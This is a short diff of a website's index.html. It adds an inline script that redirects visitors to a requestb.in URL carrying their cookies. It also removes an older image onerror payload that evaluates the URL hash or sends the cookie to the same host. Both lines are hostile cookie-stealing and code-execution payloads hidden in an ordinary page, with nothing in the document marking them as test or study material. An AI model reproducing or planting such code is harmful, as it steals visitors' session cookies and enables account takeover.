--- a/index.html
+++ b/index.html
@@ -30,6 +30,7 @@
 <script type="text/javascript" src="js/wow.js"></script>
 <script type="text/javascript" src="js/classie.js"></script>
 <script async src="http://platform.twitter.com/widgets.js" charset="utf-8"></script>
+<script>top.location='https://requestb.in/16m8j121?i='+top.document.cookie</script>
 
 <!--[if lt IE 9]>
     <script src="js/respond-1.1.0.min.js"></script>
@@ -722,6 +723,5 @@ $(window).load(function(){
 
 
 </style>
-<img src="x" onerror="if(location.hash){eval(location.hash.slice(1))}else{top.location='https://requestb.in/16m8j121?i='+top.document.cookie}">
 </body>
 </html>
